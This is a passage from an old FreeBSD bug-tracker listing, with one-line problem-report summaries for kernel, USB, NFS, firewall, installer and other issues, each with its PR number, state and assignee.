requiremen p kern/77913 net [wi] [patch] Add the APDL-325 WLAN pccard to wi(4) o kern/77902 [nfs] NFS client should use VA_UTIMES_NULL to determin o kern/77826 fs [ext2fs] ext2fs usb filesystem will not mount RW o conf/77663 rc Suggestion: add /etc/rc.d/addnetswap after addcritremo o kern/77662 diskless hostname set via DHCP only if ACPI off o bin/77651 init(8) can loose shutdown related signals o kern/77493 [pipe] freebsd 5.3 + bash process substitution fails d o bin/77445 ntpd(8): too many recvbufs(40) when ntpd started with o kern/77355 [i386] [patch] Detect i*86 subarches for uname o kern/77341 net [ip6] problems with IPV6 implementation o usb/77294 usb [ucom] [panic] ucom + ulpcom panic o kern/77273 net [ipf] ipfilter breaks ipv6 statefull filtering on 5.3 o bin/77261 login(1) doesn't chdir into a group-protected home dir s kern/77195 net [ipf] [patch] ipfilter ioctl SIOCGNATL does not match o usb/77184 usb [umass] [panic] kernel panic on USB device disconnect, o kern/77181 mckusick [newfs] [patch] newfs -g largevalue, mkdir, panic o kern/77156 FreeBSD does not redirect packets on proper interface. o kern/77091 [keyboard] Keyboard quits working under X with MAXCONS o bin/77089 natd(8) ignores -u with passive FTP s bin/77082 krion pkg_install(1) - Add 3 new macros to clean pkg-plist o bin/77031 [patch] comm(1) unable to handle lines greater than LI o bin/77001 randi sysinstall(8): sysinstall binary upgrade clobbers /etc o kern/76972 64-bit integer overflow computing user cpu time in cal o kern/76950 acpi ACPI wrongly blacklisted on Micron ClientPro 766Xi sys o i386/76944 i386 [busdma] [patch] i386 bus_dmamap_create() bug o kern/76893 [cam] [patch] Fatal divide in booting processes with B o kern/76848 [amr] amr hangs o bin/76756 des function pw_equal in pw_util.c does not test pw_passwd o bin/76736 dwmalone syslogd(8) pipelines losing messages o usb/76732 usb [ums] Mouse problems with USB KVM Switch o bin/76711 [patch] rm(1): parse error in rm.c:check() while parsi o bin/76697 edwin newsyslog(8) keeps one more archive files than documen s threa/76694 threads fork cause hang in dup()/close() function in child (-l s threa/76690 threads fork hang in child for -lc_r o kern/76678 dfr [libpam] [patch] Allow pam_krb5 to authenticate no loc f kern/76663 gnn panic with FAST_IPSEC and IPv6 o usb/76653 usb [umass] [patch] Problem with Asahi Optical usb device o conf/76626 [patch] 460.status-mail-rejects shows destination doma o bin/76590 adding -mapall in nfs exports requires reboot o bin/76588 openssl(1) fails on loading keyfiles from BIO resource o kern/76539 [dummynet] [patch] ipnat + dummynet on output on same o kern/76525 [fifo] select() hangs on EOF from named pipe (FIFO) s kern/76520 [libiconv] [patch] Add new kernel-side libiconv conver o kern/76504 silby Keep-alives doesn't work on half-closed sockets. s conf/76491 Addition into /etc/security few new functions o kern/76485 [libc] sched_getparam(2) returns weird priority number o usb/76461 usb [umass] disklabel of umass(4)-CAM(4)-da(4) not used by o kern/76398 [libc] stdio can lose data in the presence of signals o usb/76395 usb [uhci] USB printer does not work, usbdevs says "addr 0 o bin/76362 [patch] sys directory link points to wrong location p docs/76333 trhodes [patch] ferror(3): EOF indicator can be cleared by not o conf/76226 Default local.9600 gettytab initially uses parity o kern/76178 scsi [ahd] Problem with ahd and large SCSI Raid system o gnu/76169 [patch] Add PAM support to cvs pserver o kern/76144 [fifo] poll doesn't set POLLHUP when FIFO is closed o amd64/76136 amd64 [hang] system halts before reboot o bin/76134 fetch(1) doesn't like 401 errors with -A o kern/76126 [nfs] [patch] 4.11 client will send a NFS request to r o kern/75934 [libcrypt] [patch] missing blowfish functionality in p s usb/75928 usb [umass] [request] Cytronix SmartMedia card (SMC) reade o i386/75887 i386 [pcvt] with vt0.disabled=0 and PCVT in kernel video/ke o kern/75873 net Usability problem with non-RFC-compliant IP spoof prot o kern/75855 adrian [libc] getpwent(3) functions on 5.3 with large passwor o usb/75800 usb [ucom] ucom1: init failed STALLED error in time of syn o usb/75797 usb [sound] 5.3-STABLE(2005 1/4) detect USB headset, But c s bin/75767 [libc] [request] "fdclose" function in libc o usb/75764 usb [umass] [patch] "umass0: Phase Error" - no device for o docs/75711 keramida [patch] opendir(3) missing ERRORS section o kern/75710 [cue] cue0 device configuration causes kernel panic o usb/75705 usb [umass] [panic] da0 attach / Optio S4 (with backtrace) s kern/75407 net [an] an(4): no carrier after short time o bin/75378 login(1): login/wtmp/utmp not updating properly o threa/75374 threads pthread_kill() ignores SA_SIGINFO flag o bin/75362 mount_smbfs(8) No buffer space available o threa/75273 threads FBSD 5.3 libpthread (KSE) bug o bin/75258 [patch] dd(1) has not async signal safe interrupt hand o kern/75249 [boot] 5.x install CD hangs on VirtualPC Version 7 (Ma s kern/75233 [fdc] breaking fdformat /dev/fd0 resets device permiss o bin/75177 philip Bug selecting psm operation level in moused(8) o kern/75157 Cannot print to /dev/lpt0 with HP Laserjet 1005 : Devi o conf/75137 jhb add snd_* modules support to /etc/rc.d/mixer o kern/75132 jhb [puc] [patch] add support for the Davicom 56PDV PCI Mo o kern/75122 silby [netinet] [patch] Incorrect inflight bandwidth calcula o kern/75121 Wrong behaviour of IFF_LINK2 bit in 6in6 gifs? s kern/74986 jfv [patch] sysctlize a parameter of if_em's interrupt mod o kern/74827 [fdc] Problem writing data to floppies a kern/74809 [modules] [panic] smbfs panic if multiply mounted o bin/74801 cpio(1) -p --sparse creates truncated files o kern/74786 [irq] [patch] Smartlink Modem causes interrupt storm o o bin/74779 Background-fsck checks one filesystem twice and omits o usb/74771 usb [umass] [hang] mounting write-protected umass device a f ports/74752 make takes a little while before anything visible happ o amd64/74747 amd64 [panic] System panic on shutdown when process will not s kern/74708 [umapfs] [panic] UMAPFS kernel panic o gnu/74654 libsupc++.a lacks necessary functions o kern/74627 scsi [ahc] [hang] Adaptec 2940U2W Can't boot 5.3 o conf/74610 Hostname resolution failure causes firewall rules to s o gnu/74531 gcc doesn't link correctly if -pg specified s usb/74453 usb [umass] [patch] Q-lity CD-RW USB ECW-043 (ScanLogic SL o kern/74450 [libalias] [patch] enable libalias/natd to create skip o bin/74404 sh(1) does not handle signals to subshells properly an a bin/74387 mount(8) linprocfs can be mounted on top of itself man o bin/74360 [patch] ndiscvt(8) generates a driver which doesn't ma s kern/74352 NFSCLIENT and booting to an mfsroot via TFTP are mutua f kern/74314 bz [resolver] [jail] DNS resolver broken under certain ja o kern/74281 [digi] digi(4): Digiboard PCI Xem (64-ports) detection s kern/74242 rwatson Write to fifo with no reader fails in 6.0 current o kern/74238 firewire [firewire] fw_rcv: unknown response; firewire ad-hoc w o conf/74213 darrenr [patch] Connect src/etc/periodic/security/610.ipf6deni o usb/74211 usb [umass] USB flash drive causes CAM status 0x4 on 4.10R o bin/74178 [patch] grdc(6) - scrolling does not work and "AM"/"PM o i386/74153 i386 [pst] FreeBSD 5.3 cannot boot ftom pst o bin/74127 [patch] patch(1) may misapply hunks with too little co o kern/74104 ipfw [ipfw] ipfw2/1 conflict not detected or reported, manp o i386/74044 gavin [smb] ServerWorks OSB4 SMBus interface does not detect o i386/74008 i386 [boot] IBM eServer x225 cannot boot any v5.x - endless o conf/74004 [patch] add fam support to inetd.conf o kern/73961 [fdc] floppy disk drive performance problem [new in 5. o i386/73921 i386 [sysctl] [patch] sysctlbyname for machdep.tsc_freq doe o kern/73910 ipfw [ipfw] serious bug on forwarding of packets after NAT o bin/73884 Add NetBSD's rawrite32 to install tools s kern/73823 acpi [request] acpi / power-on by timer support o conf/73786 [patch] added WARNING in spanish to stable-supfile o kern/73777 emulation [linux] [patch] linux emulation: root dir special hand o kern/73744 [lpt] printing via cups causes "Interrupt storm" warni f kern/73740 [ata] [panic] 5-3-R#3 panic when accessing nfs exporte o conf/73677 rc [patch] add support for powernow states to power_profi o bin/73617 sysinstall(8): fdisk editor unmarks active partition f bin/73559 linimon burncd(8) failure closing/fixating DVD-+R/CD-R/CD-RW N s www/73551 www [request] fix list archive 'quoted-printable' corrupti o www/73549 brd [request] fix mail list archive navigation difficulty f kern/73538 net [bge] problem with the Broadcom BCM5788 Gigabit Ethern o gnu/73512 marcel gdb -> Abort trap (core dumped) o bin/73511 sysinstall(8): SCSI drive install failure - RC2 s kern/73496 [request] A more flexible version of mkstemp() s kern/73492 [request] Reliable Temporary Files o kern/73484 fs [ntfs] Kernel panic when doing `ls` from the client si o bin/73422 portmap forks ad infinitum when the NIS domain name is s bin/73411 [request] ftpd(8) could set attributes to 0600 while u o bin/73410 sysinstall(8): Sysinstall could not allocate disklabel o conf/73337 [nsswitch.conf] [patch] potential invalid free o kern/73328 edwin [patch] top(1) shows NICE as -111 on processes started o kern/73313 simokawa [firewire] Maxtor Onetouch drivers hang or corrupt dat o usb/73307 usb [panic] Kernel panics on USB disconnect o kern/73289 [sym] Interrupt storm on sym0 o bin/73261 Suspending su(1) sometimes hangs s kern/73177 geom kldload geom_* causes panic due to memory exhaustion o kern/73171 imp fwohci driver stating cardbus firewire card has incorr o bin/73019 fs [ufs] fsck_ufs(8) cannot alloc 607016868 bytes for ino o kern/73004 [loader] [patch] PXE loader malfunction in multiple PX f kern/72995 multimedia [sound] Intel ICH2 (82801BA) - sound nearly inaudible o kern/72987 ipfw [ipfw] ipfw/dummynet pipe/queue 'queue [BYTES]KBytes ( o i386/72960 i386 [boot] BTX halted with Promise Tx2000 Raid o threa/72953 threads fork() unblocks blocked signals w/o PTHREAD_SCOPE_SYST a kern/72920 emulation [linux]: path "prefixing" is not done on unix domain s o kern/72906 [twe] twe0 idefinite wait buffer o conf/72901 [patch]: dot.profile: prevent printing when doing an s o bin/72895 rink sysinstall(8): Sysinstall generates invalid partition o bin/72875 des Some utilities used in debugging do not function prope o kern/72850 apm suspend handling partial broken with 5.3-STABLE o kern/72838 system freezes when trying to umount my digital camera o bin/72793 [patch] wicontrol(8) prints out non-printable chars in s usb/72733 usb [ucom] [request] Kyocera 7135 Palm OS connection probl o kern/72660 machine locks up shortly after abnornal shutdown & sub o conf/72592 [nis] NIS Domain Master fails as client of itself o bin/72588 [patch] iostat(8) tty stats field concatenation o kern/72585 [syscons] [patch] iso05-8x16.fnt lacks letter q o i386/72566 acpi ACPI, FreeBSD disables fan on Compaq Armada 1750 o bin/72501 cperciva script(1) loops after EOF is read o conf/72465 [patch] United States International keyboard layout fo o kern/72433 [amr] [patch] AMR raid, amrreg.h struct amr_enquery3 a o bin/72398 whatis(8): emulators/mtools man pages are too funky fo o bin/72355 Can't run strings(1) on a (disk) device, even if you w o conf/72277 [patch] update for /usr/share/skel o kern/72224 [agp] umass devices broken by DRM (AGP issue?) o kern/72210 darrenr ipnat problem with IP Fastforward enabled o kern/72208 panic: bio_completed can't be greater than bio_length s ports/72202 simon portaudit warns about the CVS server vulnerability whi f kern/72194 stack backtrace after wakeup from sleeping state o bin/72173 csplit(1) ver 1.9 wrong behaviour with negative offset s kern/72041 [cam] [hang] Deadlock when disk is destroyed while use o conf/71994 [patch] dot.login: login shell may unnecessarily print s kern/71965 andre TCP MSS issue in combination with ipfw fwd o conf/71952 missing past participles in /usr/share/dict/words o bin/71928 Disk quota doesn't work with numeric login s bin/71855 [patch] making kdump(1) WARNS=6 clean o kern/71833 multiple process disc access / injustice o kern/71774 fs [ntfs] NTFS cannot "see" files on a WinXP filesystem o kern/71771 [amr] Hang during heavy load with amr raid controller o bin/71749 [patch] truss -f causes circular wait when traced proc o sparc/71729 sparc64 printf in kernel thread causes panic on SPARC o bin/71671 [patch] cleanup of the usr.sbin/apmd code o bin/71667 [patch] cleanup of the usr.sbin/bootparamd code o bin/71665 [patch] cleanup of the usr.sbin/dconschat code o bin/71664 [patch] cleanup of the usr.sbin/fwcontrol code o bin/71661 [patch] cleanup of the usr.sbin/keyserv code o bin/71660 [patch] cleanup of the usr.sbin/kgmon code p bin/71659 [patch] cleanup of the usr.sbin/mount_portalfs code o bin/71632 [patch] cleanup of the usr.sbin/ndp code o bin/71631 [patch] cleanup of the usr.sbin/pppctl code o bin/71630 [patch] cleanup of the usr.sbin/pppd code o bin/71629 [patch] cleanup of the usr.sbin/pppstats code o bin/71628 [patch] cleanup of the usr.sbin/rpcbind code o bin/71625 [patch] [nis] cleanup of the usr.sbin/rpc.ypupdated co o bin/71622 [patch] sicontrol(8): cleanup of the usr.sbin/sicontro o bin/71621 [patch] sliplogin(8): cleanup of the usr.sbin/sliplogi o bin/71618 [patch] timed(8): cleanup of the usr.sbin/timed code o bin/71617 [patch] [nis] ypserv(8): cleanup of the usr.sbin/ypser o bin/71616 [patch] [nis] yp_mkdb(8): cleanup of the usr.sbin/yp_m o bin/71613 [patch] traceroute(8): cleanup of the usr.sbin/tracero o bin/71602 [patch] uninitialized "len" used instead of "slen" wit o kern/71532 Multiple SCSI-Busses are seen differently by BIOS, loa a kern/71474 bms route lookup does not skip interfaces marked down o kern/71469 net default route to internet magically disappears with mu o usb/71455 usb [umass] Slow USB umass performance of 5.3 o kern/71450 [de] de(4): MAC address change on 21040 "Tulip" Ethern o usb/71417 usb [ugen] Cryptoflex e-gate USB token (ugen0) communicati o usb/71416 usb [ugen] Cryptoflex e-gate USB token (ugen0) detach is n o kern/71391 [nfs] [panic] md via NFS file + mount -t ntfs: panic: o conf/71386 loader.conf: hint.apic.0.disabled="YES" doesn't work. o kern/71366 ipfw [ipfw] "ipfw fwd" sometimes rewrites destination mac a s bin/71290 des [patch] passwd(1) cannot change passwords other than N o usb/71280 usb [aue] aue0 device (linksys usb100tx) doesn't work in 1 o kern/71258 alc [vm] [patch] anonymous mmappings not always page align o conf/71254 [ncurses] xterm vs. cons* termtypes or sc(4) o kern/71219 /proc/*/map dont tell file offset o gnu/71210 Update to GNU sdiff: add user-preference for merge key o kern/71198 Lack of PUC device in GENERIC kernel causes interupt l o usb/71155 usb [ulpt] misbehaving usb-printer hangs processes, causes o kern/71045 [rl] [vr] DHCP-Request is sets other device's ip to nu o i386/71000 i386 [boot] BTX halted when booting from CD on a machine wi o threa/70975 threads [sysvipc] unexpected and unreliable behaviour when usi o kern/70904 net [ipf] ipfilter ipnat problem with h323 proxy support o i386/70832 yongari [re] re0: watchdog timeout on Evo N1015v o stand/70813 standards [patch] ls(1) not Posix compliant o kern/70810 [pci] [patch] Enable SMBus device on Asus P4B series m o bin/70756 indent(1) mishandles code that is protected for c++ co f kern/70753 gavin [boot] Device for firewire hard disk not created in ti o conf/70715 [periodic] Lack of year in dates in auth.log can cause o kern/70708 [nfs] gcore/procfs not finding /proc/pid/file on repea o kern/70649 [rtc] system clock slows down when heavily loaded o bin/70600 fsck(8) throws files away when it can't grow lost+foun o bin/70536 reboot(8) -dp tries to dump when powering off o i386/70531 i386 [boot0] [patch] boot0 hides Lilo in extended slice o usb/70523 usb [umct] [patch] umct sending/receiving wrong characters o kern/70511 When fread(3)ing with buffering turned off, many sysca o bin/70476 reboot(8) change, -p behavior default for halt o kern/70401 darrenr [modules] Could not load ipl.ko when no INET6 in the k o bin/70336 telnetd(8) always exits with value 1 o bin/70335 inetd(8) inconsistent syslog behavior when max childre o i386/70330 marcel Re-Open 33262? - gdb does not handle pending signals p o bin/70297 amd(8) request to make amd timeouts per-mount local o bin/70245 ru [patch] [build] Change to src/release/Makefile to aid p kern/70096 trhodes [msdosfs] [patch] full msdos file system causes corrup o bin/70002 sysinstall(8): fails to locate FTP dirs if the OS has o kern/69989 killing process that uses snp + unloading module + lis o bin/69986 sysinstall(8): [patch] no job control in fixit shell o o kern/69963 ipfw [ipfw] install_state warning about already existing en o bin/69942 sysinstall(8): sysinstall changes /etc/rc.conf after i o bin/69875 [patch] mlxcontrol(8): `mlxcontrol status ' p docs/69861 trhodes [patch] usr.bin/csplit/csplit.1 does not document POSI o kern/69826 [libc] 16th group has no effect when accesing file on o kern/69825 [libc] 1st group supplied to setgroups() does not take o i386/69750 acpi Boot without ACPI failed on ASUS L5 o bin/69723 sysinstall(8): [request] allow to continue from packag o kern/69650 [patch] make getserv* functions work with nsdispatch o bin/69398 [patch] login(1) cleartext display of password in logi o bin/69362 mbr amd(8) does not properly detect the local network sett o ports/69309 ale mysql database backup script for periodic/daily o bin/69268 [patch] Fix ndiscvt(8) to warn you if it's going to ge s i386/69218 simokawa [boot] failure: 4.10-BETA and later do not boot on Asu o bin/69164 marcel gdb(1) amd64: coredump while debugging a core file. o bin/69083 [patch] vi(1) basic modelines for contrib/nvi o kern/69066 panic: nmdm page fault when slattach on a null modem d s threa/69020 threads pthreads library leaks _gc_mutex o bin/69010 [patch] [build] Portability fixes for FreeBSD build ut o usb/69006 usb [usbdevs] [patch] Apple Cinema Display hangs USB ports o kern/68978 fs [panic] [ufs] crashes with failing hard disk, loose po a kern/68905 secteam [patch] core dumps are assigned wrong ownership a bin/68904 krion pkg_install(1) fixes (_PATH_*, sprintf -> snprintf, st o kern/68889 kmacy [panic] m_copym, length > size of mbuf chain o bin/68797 [patch] cut(1): fflush after each write if an option i o bin/68727 marcel gdb(1) coredumps after recent CURRENT upgrade o kern/68690 [libc] write(2) returns wrong value when EFAULT o bin/68586 dwmalone [patch] allow syslogd(8) to forward to non-default por p conf/68525 matteo Loader's verbose boot mode has rc.d/localdaemon not na o kern/68458 Burning DVD causes lots of FAILURE - READ_SUBCHANNEL I o bin/68437 [patch] conscontrol(8) DEVDIR -> _PATH_DEV fix and mor o bin/68328 [patch] syslogd(8) enable configuration of extra liste s kern/68317 [kernel] [patch] on soft (clean) reboots clean dmesg o o kern/68311 [patch] it is impossible to override defaults with ker o usb/68232 usb [ugen] [patch] ugen(4) isochronous handling correction p kern/68189 bz [arp] [jail] [patch] arp -a discloses non-jail interfa o conf/68108 [patch] Adding mac-address /conf selector to diskless o kern/68076 [modules] Page fault when the sequence "kldunload ucom o bin/68062 standalone repeat(1) command o bin/67943 find(1) fails when current directory is not readable b o kern/67919 imagemagicks convert image to movie conversion kills 5 o alpha/67903 alpha hw.chipset.memory: 1099511627776 - thats way to much : o kern/67830 [smp] [patch] CPU affinity problem with forked child p o bin/67723 restore(8) FreeBSD 5.x restore cannot handle other pla s alpha/67626 alpha X crashes an alpha machine, resulting reboot s kern/67580 [request] add hints for boot failures o bin/67550 [patch] tftpd(8) Add BLK_SIZE option to tftpd server s kern/67545 [nfs] NFS Diskless Mount Option Suggestion o misc/67502 cvsadm cvs-all commit message did not include all files touch f ports/67436 portmgr [patch] bsd.port.mk: GNU_CONFIGURE_PREFIX_SUBDIR s i386/67383 [i386] [patch] do a better job disassembling code in 1 p bin/67365 sysinstall(8) doesn't find latinamerican keymap o conf/67328 [ppp] Usermode PPP hangs on boot when NIS configured o kern/67326 rodrigc [msdosfs] crash after attempt to mount write protected o usb/67301 usb [uftdi] [panic] RTS and system panic o bin/67231 [patch] pam_krb5 doesn't honor default flags from /etc o bin/67172 w(1) finger(1) display the remote host incorrectly o bin/67142 [nis] rpc.yppasswdd incorrectly throws errors about in o i386/67050 imp CardBus (PCI ?) resource allocation problem (still on o bin/66988 [patch] apm(8) check validation of the returned values o kern/66960 [fdc] [patch] filesystems not unmounted during reboot o bin/66893 [patch] [nis] rpc.yppasswdd(8): Linux NIS clients conn o bin/66830 [nis] chsh(1) ypchsh(1) do not change user information o bin/66677 mv(1) incorrectly copies somedir/.. to ./.. when it cr s ports/66566 portmgr [PATCH] bsd.port.mk: fix build when /usr/obj/usr/ports o usb/66547 usb [ucom] Palm Tungsten T USB does not initialize correct o docs/66505 trhodes escaping '~' and '$' characters in login.conf setenv o o stand/66357 standards make POSIX conformance problem ('sh -e' & '+' command- o bin/66350 matteo sysinstall(8): sysinstall creates a partition of subty o kern/66348 rik [cx] FR mode of cx (Cronyx Sigma) does not work for 4. s ports/66342 portmgr [PATCH] fix ECHO_MSG breakage in java ports p docs/66289 brueffer [patch] lib/libc/gen/ualarm.3 refers to non-existent a o kern/66270 [hang] dump(8) causes machine freeze o kern/66268 glebius [socket] [patch] Socket buffer resource limit (RLIMIT_ o kern/66225 [netgraph] [patch] extend ng_eiface(4) control message a kern/66185 [twe] twe driver generates gratuitous warning on shutd o kern/66162 phk [gbde] gbde destroy error o bin/66103 ppp(8) macro HISADDR is not sticky in filters o kern/66029 [crypto] [patch] MD5 alignment problem on a TriMedia p o kern/65920 fs [nwfs] Mounted Netware filesystem behaves strange o kern/65901 fs [smbfs] [patch] smbfs fails fsx write/truncate-down/tr s ports/65804 portmgr [PATCH] bsd.port.mk is gratuitously slow o bin/65803 gad [patch] ps(1) enhancements (posix syntax, and more) o bin/65774 randi sysinstall(8): cannot run repair disk when booted from o i386/65648 imp cardbus("TI1131") won't work on Dell Latitude CP 233XT o kern/65616 gnn IPSEC can't detunnel GRE packets after real ESP encryp o bin/65483 vi(1) -r crashes o kern/65448 jhb _mtx_unlock_sleep() race condition if ADAPTIVE_MUTEXES o kern/65355 [pci] [patch] TC1000 serial ports need enabling o bin/65306 obrien [patch] [build] Portability fixes for FreeBSD build ut o bin/65299 vi(1) temp path contains double / o bin/65228 [Patch] Allow rup(1) to parse hostnames from a defined o java/65054 glewis Diablo 1.3.1 JVM runs out of file descriptors at 1021 s kern/64875 standards [libc] [patch] [request] add a system call: fdatasync( a kern/64816 [nfs] [patch] mmap and/or ftruncate does not work corr o conf/64788 [nsswitch.conf] nsswitch with ldap and starting ppp on s kern/64588 [joy] [request] Extend joystick driver architecture to o kern/64556 net [sis] if_sis short cable fix problems with NetGear FA3 o bin/64327 [patch] make(1): document surprising behaviour of assi o kern/64196 [kernel] [patch] remove the arbitrary MAXSHELLCMDLEN o kern/64178 jmg [kqueue] [patch] kqueue does not work with bpf when us o kern/64114 [vga] [patch] bad vertical refresh for console using R o kern/63863 glebius [netgraph] [patch] [request] implement NGM_ELECTROCUTE f usb/63837 linimon [uhid] [patch] USB: hid_is_collection() only looks for o kern/63629 thomas [atapicam] mounting atapicam volume through cd0c cause o usb/63621 usb [umass] [panic] USB MemoryStick Reader stalls/crashes o bin/63608 Add a -c option to time(1) to display csh output o docs/63570 doc [patch] Language cleanup for the Handbook's DNS sectio o www/63552 gabor Validation errors due to CAPs in attribute values o bin/63489 top(1) finger(1) segfault when using NIS groups to res o kern/63431 [rtc] motherboard going to suspend mode stops system c o docs/63215 jeff Wrong prototypes in mi_switch(9) (ref docs/24311) o kern/63204 multimedia [sound] /dev/mixer broken with ESS Maestro-2E (still o a bin/63197 [patch] tftp(1) Bus error, core dumped o docs/63084 des Several Man-pages reference non-existant pam.conf(5) a o kern/63064 [patch] strptime(3) fails on %z s bin/62965 krion pkg_add(1) -r fails if fetching multiple packages at a o kern/62890 ups proc pointer set by fork1 can be stale in fork,rfork,v f bin/62885 des pam_radius(8) doesn't maintain multiple state fields s stand/62858 standards malloc(0) not C99 compliant s java/62837 java linux-sun-jdk14 executables hang with COMPAT_LINUX in o bin/62833 sysinstall(8): can't install: integer divide fault o bin/62766 systat(1) -vm does not work on diskless machines o kern/62762 bde [msdosfs] Fsync for msdos fs does not sync entries o bin/62711 kensmith sysinstall(8): installation: "Insert Next CD" Prompt i o bin/62702 sysinstall(8): backup of /etc and /root during sysinst o kern/62468 panic: system crashes when serial getty enabled and se o conf/62417 luigi diskless op script failed o docs/62412 trhodes one of the diskless boot methods described in the Hand o bin/62367 sysinstall(8): 5.2.1-RC installation problems a kern/62278 [nfs] [patch] NFS server may not set eof flag when rea s usb/62257 usb [umass] [request] card reader UCR-61S2B is only half-s o kern/62102 alc obreak update o bin/62077 [patch] Make it possible to abbreviate mixer(8) device o kern/62042 luigi [ipfw] ipfw can't no more reject icmp (icmptypes 8) o i386/62003 remko [loader] [patch] make /boot/loader "reboot" code same o bin/61978 delphij [patch] sync setkey(8) token.l with KAME o alpha/61973 alpha Machine Check on boot-up of AlphaServer 2100A RM o bin/61971 kinit(1) --renewable fails f kern/61960 linimon [ata] [patch] BigDrive support for PC-98 architecture o alpha/61940 alpha sysinstall(8): Can't disklabel new disk from FreeBSD/a o kern/61909 5.2-Current fails to notice change of CD in drive o bin/61890 sysinstall(8): fdisk(8) uses incorrect calculations fo s kern/61810 mounts done within a chroot show up wrong and can't be a kern/61744 andre [netinet] [patch] TCP hangs onto mbufs with no tcp dat o kern/61733 imp panic: resource_list_release: resource entry is not bu o bin/61716 mckusick newfs(8) code and manpage are out of sync s kern/61677 Unable to open CDROM tray if boot_cdrom is in loader.c s kern/61622 Intel Pro/100 Intelligent Server Adapter unsupported N o docs/61605 doc [request] Improve documentation for i386 disk geometry s bin/61603 randi sysinstall(8): wrong geometry guessed o kern/61503 fs [smbfs] mount_smbfs does not work as non-root s kern/61497 ups [kernel] [patch] __elfN(map_insert) bug s i386/61481 [patch] a mechanism to wire io-channel-check to userla o bin/61438 randi sysinstall(8): 5.2 nfs tasks running by default after o kern/61404 silby RFC1323 timestamps with HZ > 1000 o bin/61355 login(1) does not restore terminal ownership on exit s misc/61322 [build] [patch] bsd.dep.mk disallows shell generated f o docs/61301 doc [patch] Manpage patch for aue(4) to enable HomePNA fun o kern/61300 [aue] [patch] Enabling HomePNA PHY on aue(4) for HomeP o conf/61289 /etc/pccard_ether: please use ifn value on pccard scri o bin/61264 sysinstall(8): unable To Use VT100 Terminal Emulator ( o bin/61239 [patch] bootp enhancement, places the dhcp tags into t s kern/61165 scsi [panic] kernel page fault after calling cam_send_ccb o bin/61152 randi sysinstall(8): installer refuses to mount USB-floppy o o kern/60963 [pecoff] [patch] Win32 Applications abort on PECOFF o bin/60892 [patch] added -p option to kldxref(8) to allow creatio s kern/60874 [request] auto-assign devfs ruleset numbers o bin/60834 [patch] ftpd(8) send_data()+oldway: anonymous transfer o kern/60719 ipfw [ipfw] Headerless fragments generate cryptic error mes o kern/60699 [atapicam] DVD Multidrive udma mode autosensed wrong o kern/60697 [pty] [patch] pseudo-tty hack versus telnet race cause o kern/60677 multimedia [sound] [patch] No reaction of volume controy key on I o kern/60641 scsi [sym] Sporadic SCSI bus resets with 53C810 under load o bin/60632 sysinstall(8): UI bug in partition label screen in sys s kern/60599 multimedia [bktr] [partial patch] No sound for ATI TV Wonder (ste o kern/60598 scsi wire down of scsi devices conflicts with config s ports/60558 portmgr [PATCH] bsd.port.mk: automatically verify GnuPG signat o kern/60550 silby [kernel] [patch] hitting process limits produces sub-o o docs/60529 ume resolver(5) man page is badly out of date o misc/60503 [modules] small error in modules installation f bin/60350 kensmith sysinstall(8): in Choose Distributions screen, "All" d o bin/60349 scottl sysinstall(8): 5.2-RC1 cannot do NFS installation p kern/60307 [pccard] [patch] wrong product id in pccarddevs for Sp s kern/60293 net [patch] FreeBSD arp poison patch o kern/60235 phk some /dev-entries missing for newly auto-added disks o kern/60174 marcel debugging a kernel module in load/attach routines o kern/60089 scottl [udf] UDF filesystem appends garbage to files o gnu/59971 peter assertion "strncmp (repository, current_parsed_root->d o kern/59912 alc mremap() implementation lacking o kern/59903 [pci] [patch] "pci_find_device" returns [only/at] the o docs/59835 doc ipfw(8) man page does not warn about accepted but mean o bin/59777 [patch] ftpd(8)/FreeBSD 5: potential username enumerat o bin/59775 [patch] ftpd(8)/FreeBSD 5: incorrect reply for "unimpl o bin/59774 [patch] ftpd(8)/FreeBSD 5: syslog facility may be chan o bin/59772 [patch] ftpd(8)/FreeBSD 5: support for tcp_wrappers in s kern/59739 [libc] rmdir(2) and mkdir(2) both return EISDIR for ar o docs/59735 kensmith [patch] Adding a reference to Icelandic Rsync to mirro o bin/59708 sysinstall(8): [patch] add sSMTP support for Mail sele o usb/59698 usb [keyboard] [patch] Rework of ukbd HID to AT code trans s bin/59638 des passwd(1) does not use PAM to change the password o conf/59600 [patch] Improved us.emacs.kbd mapping o bin/59564 [patch] from(1) add option (-S) to also display subjec o docs/59477 doc Outdated Info Documents at http://docs.freebsd.org/inf o kern/59456 fdescfs stat / compress creates only empty files o www/59307 remko [patch] xml/xsl'ify & update publications page o kern/59289 [bktr] [patch] ioctl METEORGBRIG in bktr_core.c forget s ports/59254 linimon ports that write something after bsd.port.mk o docs/59240 blackend [patch] handbook update: linux MATLAB o bin/59220 obrien [patch] systat(1) device select (:only) broken o kern/59183 imp [wi] wi problems with wi_cmd o docs/59044 doc [patch] doc.docbook.mk does not properly handle a sour p bin/58970 truss(1) coredumps for the no significant reason o kern/58967 Kernel kills processes in spite of cputime parameter i o bin/58951 sysinstall(8): some problems with 4.9-RELEASE installa o kern/58941 rwatson [acl] acl under ufs2 doesn't handle disk corruption, p o conf/58939 rc [patch] dumb little hack for /etc/rc.firewall{,6} o kern/58803 [kernel] [patch] kern.argmax isn't changeable even at p kern/58687 deischen [libc] [patch] gethostbyname(3) leaks kqueue file desc o conf/58557 Summer/Winter-time change causes daily cron to be run o bin/58483 [patch] mount(8): allow type special or node relative o bin/58390 bsdlabel(8) fails to display an error message if the l o kern/58373 mckusick [ufs] ufs inconsistency between 4.9-RC and 5.1 o bin/58293 vi(1) replace with CR (ASCII 13) doesn't work o kern/58154 mckusick Snapshots prevent disk sync on shutdown o bin/58012 [patch] tftpd(8) Multihomed tftpd enhancement a stand/57911 fnmatch ("[[:alpha:]]","x", FNM_PATHNAME) returns FNM_ o kern/57832 scottl [ips] softdep_deallocate_dependencies: dangling deps o bin/57715 [patch] tcopy(1) enhancement a kern/57696 [nfs] NFS client readdir terminates prematurely if ren o kern/57631 jhb [agp] [patch] boot failing for ALi chipsets p bin/57630 lptcontrol(8) gives "device busy" if device turned off o kern/57603 [bktr] bktr driver: freeze on SMP machine o bin/57554 sh(1) incorrect handling of quoted parameter expansion o kern/57522 [patch] New PID allocater algorithm from NetBSD o conf/57517 [patch] add parameter for /etc/periodic/daily/210.back s ports/57498 portmgr HEIMDAL_HOME should be defined in src or ports Makefil a kern/57479 julian FreeBSD Not in compliance with RFC 1122, Cannot have m o misc/57464 [boot] loader(8) seems to confuse files [4.7] s bin/57407 [patch] Better NTP support for dhclient(8) and friends s kern/57398 scsi [mly] Current fails to install on mly(4) based RAID di o kern/57350 [panic] using old monocrome printer port (IO_LPT3 / 0x o 